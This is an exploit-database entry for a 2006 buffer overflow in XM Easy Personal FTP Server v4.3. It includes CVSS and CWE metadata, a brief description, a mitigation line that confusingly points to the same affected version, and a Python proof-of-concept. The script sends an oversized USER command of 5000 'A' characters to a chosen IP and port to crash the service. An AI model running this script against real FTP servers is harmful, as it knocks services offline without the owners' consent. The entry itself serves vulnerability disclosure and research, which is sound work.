XM EASY PERSONAL FTP SERVER v4.3 Buffer Overflow Vulnerability PoC

vendor:

XM EASY PERSONAL FTP SERVER

by:

ahmed@rewterz.com

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: XM EASY PERSONAL FTP SERVER

Affected Version From: v4.3

Affected Version To: v4.3

Patch Exists: YES

Related CWE: N/A

CPE: a:xm_easy_software:xm_easy_personal_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

XM EASY PERSONAL FTP SERVER v4.3 Buffer Overflow Vulnerability PoC

A buffer overflow vulnerability exists in XM EASY PERSONAL FTP SERVER v4.3. An attacker can send a specially crafted USER command with an overly long string, resulting in a buffer overflow. This may allow the attacker to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of XM EASY PERSONAL FTP SERVER v4.3

Source

Exploit-DB raw data:

##############################################################
# XM EASY PERSONAL FTP SERVER v4.3                           #  
# http://www.securityfocus.com/archive/1/432960/30/0/threaded# 
# Buffer Overflow Vulnerability PoC                          #  
# ahmed@rewterz.com                                          #
##############################################################

import socket
import struct
import time
import sys


buff='USER '+'A'*5000+'\r\n'

if len(sys.argv)!=3:
	print "[+] Usage: %s <ip> <port> \n" %sys.argv[0]
	sys.exit(0)

try:
	
        print "[+] Connecting to %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect((sys.argv[1],int(sys.argv[2])))
	print "[+] Sending Evil buffer"
	time.sleep(1)
	s.send(buff)
        print "[+] Service Crashed"
        s.recv(1024)
	
except:
	print "[+] Could Not Connect To ftp server"

# milw0rm.com [2006-05-04]